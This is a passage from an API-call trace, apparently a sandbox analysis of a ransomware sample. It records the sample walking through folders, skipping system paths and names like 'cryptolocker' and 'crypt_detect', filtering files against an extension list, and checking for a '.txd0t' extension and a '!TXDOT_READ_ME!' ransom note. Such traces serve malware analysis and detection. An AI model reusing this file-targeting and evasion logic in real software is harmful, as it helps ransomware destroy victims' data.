lpSrch=":\\boot\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\perflogs\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\programdata\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\drivers\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\wsus\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="crypt_detect") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="cryptolocker") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="ransomware") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\WINDOWS") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.094] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1035", lpSrch="C:\\Program Files") returned 0x0 [0071.094] GetProcessHeap () returned 0xe30000 [0071.094] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.094] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0071.094] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\*") returned="C:\\588bce7c90097ed212\\1035\\*" [0071.094] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2430 [0071.095] StrCmpW (psz1=".", psz2=".") returned 0 [0071.095] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.095] StrCmpW (psz1="..", psz2=".") returned 1 [0071.095] StrCmpW (psz1="..", psz2="..") returned 0 [0071.095] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.095] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.095] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.095] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0071.095] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0071.095] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\eula.rtf") returned="C:\\588bce7c90097ed212\\1035\\eula.rtf" [0071.095] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.095] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.095] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.096] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.096] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.096] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.096] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.096] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.096] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.096] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.096] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.096] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.096] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.096] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.096] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.096] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0071.096] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0071.096] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" [0071.096] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.096] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.097] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.097] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.097] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xml") returned 0x0 [0071.097] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.097] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.097] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.097] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.097] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.097] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.097] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0071.097] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0071.097] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0071.097] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1035", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035") returned="C:\\588bce7c90097ed212\\1035" [0071.097] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\") returned="C:\\588bce7c90097ed212\\1035\\" [0071.097] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1035\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1035\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1035\\SetupResources.dll" [0071.097] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.097] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0071.097] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0071.098] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.098] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0071.098] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0071.098] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0071.098] FindClose (in: hFindFile=0xec2430 | out: hFindFile=0xec2430) returned 1 [0071.098] GetProcessHeap () returned 0xe30000 [0071.099] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8320 | out: hHeap=0xe30000) returned 1 [0071.099] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0071.099] StrCmpW (psz1="1036", psz2=".") returned 1 [0071.099] StrCmpW (psz1="1036", psz2="..") returned 1 [0071.099] StrCpyNW (in: psz1=0xec6e60, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0071.099] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0071.099] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1036", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\system32\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\syswow64\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\system\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\windows\\winsxs\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\roaming\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\local\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\appdata\\locallow\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\all users\\microsoft\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="\\inetpub\\logs\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\boot\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\perflogs\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\programdata\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\drivers\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\wsus\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\efstmpwp\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch=":\\$recycle.bin\\") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="crypt_detect") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="cryptolocker") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="ransomware") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\WINDOWS") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\Program Files (x86)") returned 0x0 [0071.099] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1036", lpSrch="C:\\Program Files") returned 0x0 [0071.099] GetProcessHeap () returned 0xe30000 [0071.099] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0xec8320 [0071.100] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0071.100] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\*") returned="C:\\588bce7c90097ed212\\1036\\*" [0071.100] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0071.100] StrCmpW (psz1=".", psz2=".") returned 0 [0071.100] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.100] StrCmpW (psz1="..", psz2=".") returned 1 [0071.100] StrCmpW (psz1="..", psz2="..") returned 0 [0071.100] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0071.100] StrCmpW (psz1="eula.rtf", psz2=".") returned 1 [0071.100] StrCmpW (psz1="eula.rtf", psz2="..") returned 1 [0071.100] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0071.100] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0071.101] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="eula.rtf", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\eula.rtf") returned="C:\\588bce7c90097ed212\\1036\\eula.rtf" [0071.101] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.101] StrCmpW (psz1=".rtf", psz2=".txd0t") returned -1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="bootsect.bak") returned 1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="iconcache.db") returned -1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="thumbs.db") returned -1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2=" ransomware ") returned 1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2=" ransom ") returned 1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="debug.txt") returned 1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="boot.ini") returned 1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="desktop.ini") returned 1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="autorun.inf") returned 1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="ntuser.dat") returned -1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="ntldr") returned -1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="ntdetect.com") returned -1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="bootfont.bin") returned 1 [0071.101] StrCmpIW (psz1="eula.rtf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.101] PathFindExtensionW (pszPath="eula.rtf") returned=".rtf" [0071.101] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".rtf") returned 0x0 [0071.101] FileTimeToSystemTime (in: lpFileTime=0x552f6fc, lpSystemTime=0x552f6e8 | out: lpSystemTime=0x552f6e8) returned 1 [0071.101] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6e8, lpLocalTime=0x552f6b8 | out: lpLocalTime=0x552f6b8) returned 1 [0071.101] FileTimeToSystemTime (in: lpFileTime=0x552f704, lpSystemTime=0x552f6c8 | out: lpSystemTime=0x552f6c8) returned 1 [0071.101] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f6c8, lpLocalTime=0x552f6d8 | out: lpLocalTime=0x552f6d8) returned 1 [0071.101] FileTimeToSystemTime (in: lpFileTime=0x552f70c, lpSystemTime=0x552f690 | out: lpSystemTime=0x552f690) returned 1 [0071.101] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f690, lpLocalTime=0x552f680 | out: lpLocalTime=0x552f680) returned 1 [0071.101] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0071.101] StrCmpW (psz1="LocalizedData.xml", psz2=".") returned 1 [0071.101] StrCmpW (psz1="LocalizedData.xml", psz2="..") returned 1 [0071.101] StrCpyNW (in: psz1=0xec8320, psz2="C:\\588bce7c90097ed212\\1036", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036") returned="C:\\588bce7c90097ed212\\1036" [0071.101] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\") returned="C:\\588bce7c90097ed212\\1036\\" [0071.102] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1036\\", psz2="LocalizedData.xml", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned="C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" [0071.102] PathFindExtensionW (pszPath="LocalizedData.xml") returned=".xml" [0071.102] StrCmpW (psz1=".xml", psz2=".txd0t") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="bootsect.bak") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="iconcache.db") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="thumbs.db") returned -1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransomware ") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2=" ransom ") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="debug.txt") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="boot.ini") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="desktop.ini") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="autorun.inf") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="ntuser.dat") returned -1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="ntldr") returned -1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="ntdetect.com") returned -1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="bootfont.bin") returned 1 [0071.102] StrCmpIW (psz1="LocalizedData.xml", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.102] 